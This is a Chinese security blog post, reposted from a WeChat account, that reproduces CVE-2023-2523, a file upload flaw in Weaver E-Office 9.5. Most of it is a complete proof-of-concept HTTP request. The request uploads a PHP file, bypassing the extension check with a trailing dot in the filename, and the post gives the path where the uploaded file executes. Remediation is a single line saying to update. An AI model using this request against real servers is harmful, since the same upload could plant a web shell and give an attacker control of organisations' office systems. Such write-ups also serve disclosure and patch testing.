泛微 E-Office 文件上传漏洞(CVE-2023-2523)

admin
admin
admin
109443
文章
90
评论
2024年5月13日01:07:23评论17 views字数 1385阅读4分37秒阅读模式
声明:请勿将文章内的相关技术用于非法目的,如有相关非法行为与文章作者和本公众号无关。请遵守《中华人民共和国网络安全法》。
0X01 简介
泛微软件是业界领先的协同管理系统和解决方案供应商,凭借成熟的技术核心及雄厚的研发力量,基于先进的协同管理理念,自主研发了协同管理产品系列,包括泛微协同管理平台(e-cology)、泛微协同办公系统高级版(e-nature)、泛微协同办公系统标准版(e-office)和泛微协同政务系统(e-nation)四大产品系列,涵盖OA(协同办公)、EIP(企业信息门户)、KM(知识管理)、HRM(人力资源管理)、CRM(客户关系管理)、WM(工作流程管理)、PM(项目管理)、电子政务、内外网一体化管理等方面,并通过大量的客户积累和丰富的实践经验,在集团管理、高新技术、生产制造、咨询顾问、医药通信、房地产、酒店餐饮、金融业等领域形成了一整套成熟的行业解决方案。
官网:

https://www.weaver.com.cn/

漏洞编号:

CVE-2023-2523

影响范围:

Weaver E-Office 9.5版本
0X02 漏洞复现

【漏洞复现】泛微 E-Office 文件上传漏洞(CVE-2023-2523)访问路径,若存在可能存在漏洞。

http://192.168.17.131:8082/E-mobile/App/Ajax/ajax.php
【漏洞复现】泛微 E-Office 文件上传漏洞(CVE-2023-2523)

POC:

POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1.1Host: 192.168.17.131:8082User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36Content-Length: 363Accept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt



------WebKitFormBoundarydRVCGWq4Cx3Sq6ttContent-Disposition: form-data; name="upload_quwan"; filename="test.php."Content-Type: image/jpeg



<?php phpinfo();?>



-------WebKitFormBoundarydRVCGWq4Cx3Sq6ttContent-Disposition: form-data; name="file"; filename=""Content-Type: application/octet-stream



------WebKitFormBoundarydRVCGWq4Cx3Sq6tt—

注意文件后缀绕过

【漏洞复现】泛微 E-Office 文件上传漏洞(CVE-2023-2523)

http://192.168.17.131:8082/attachment/921735752/test.php

【漏洞复现】泛微 E-Office 文件上传漏洞(CVE-2023-2523)

0X03 修复建议

更新至最新版!

0X04 写在最后

原文始发于微信公众号(皓月的笔记本):【漏洞复现】泛微 E-Office 文件上传漏洞(CVE-2023-2523)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月13日01:07:23
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   泛微 E-Office 文件上传漏洞(CVE-2023-2523)https://cn-sec.com/archives/2077451.html

发表评论

匿名网友 填写信息